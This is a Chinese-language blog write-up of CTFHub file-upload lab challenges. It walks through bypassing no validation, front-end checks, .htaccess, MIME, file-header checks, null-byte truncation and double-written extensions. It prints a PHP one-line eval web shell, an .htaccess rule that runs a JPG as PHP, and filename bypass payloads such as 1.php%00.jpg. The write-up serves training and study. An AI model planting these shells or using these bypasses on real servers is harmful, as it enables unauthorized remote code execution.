【CTFHub】文件上传

目录

1.无验证

2.前端验证

3.htaccess验证

4.MIME验证

5.文件头检查

6. 00截断


1.无验证

进入环境,

无限制的话,我们直接上传php文件的一句话木马:

<?php @eval($_POST['a'])?>

 

获得了上传文件相对路径,打开HacBar:

加上上传文件相对路径,勾选post data,用phpinfo查看木马是否存活:

a=phpinfo();

出现这个就代表成功上传了木马并且存活,现在可以打开蚁剑:

复制网址到URL地址,密码是a :

测试一下连接,添加即可:

flag就在flag这个文件夹中:

ok,成功获取了flag。

2.前端验证

开启环境,尝试上传php格式的一句话木马:

前端验证就是把特定的文件类型屏蔽了,无法直接上传php, 这里我把他改成.jpg试试

可以看到,一句话木马.jpg上传成功,可以打开burp suite进行抓包:

在这里将jpg后缀改成php,点击send:

将上传文件路径复制下来:

用HacBar检查木马是否存活:

记得带上路径 :upload/1.php

然后打开蚁剑:

添加数据 ,

可以直观的看到,我们上传的1.php在里面存活 ,我们就是通过这个木马文件进行的。

 在这个目录下发现flag,双击进去就可以看到flag。

3.htaccess验证

htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

先上传htaccess文件,然后上传jpg格式文件,让他以php的格式执行。

先上传 .htaccess :

<FilesMatch "1.jpg">
       SetHandler  application/x-httpd-php
</FilesMatch>      

再上传一句话木马1.jpg:

用蚁剑连接即可。

4.MIME验证

上传一句话木马,抓包:

将jpg后缀改为php然后send,得到文件路径,再用蚁剑连接:

成功得到flag。

5.文件头检查

试着直接传木马jpg文件发现行不通:

它检测头文件,那我们上传一自己随便画的图:

用bp爆出来:

在图片中加入木马:

<?php @eval($_POST['a']);?>

用蚁剑连接即可:

6. 00截断

0x00字符串是结束表示符,可以利用它来把后面的内容截断。

将一句话木马改为文件名1.php.jpg进行上传

用bp抓包:

在上方的/upload/后面加1.php%00.jpg

下方filename也改为1.php%00.jpg,接下来用蚁剑连接即可,路径就是upload/1.php:

7.双写后缀

这题看一下源码,

php会被过滤,但是只过滤一次,所以双写成:1.pphphp

他过滤了一个php,结果变成了1.php:

用蚁剑连接:

获得flag。

感谢您的观看!

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值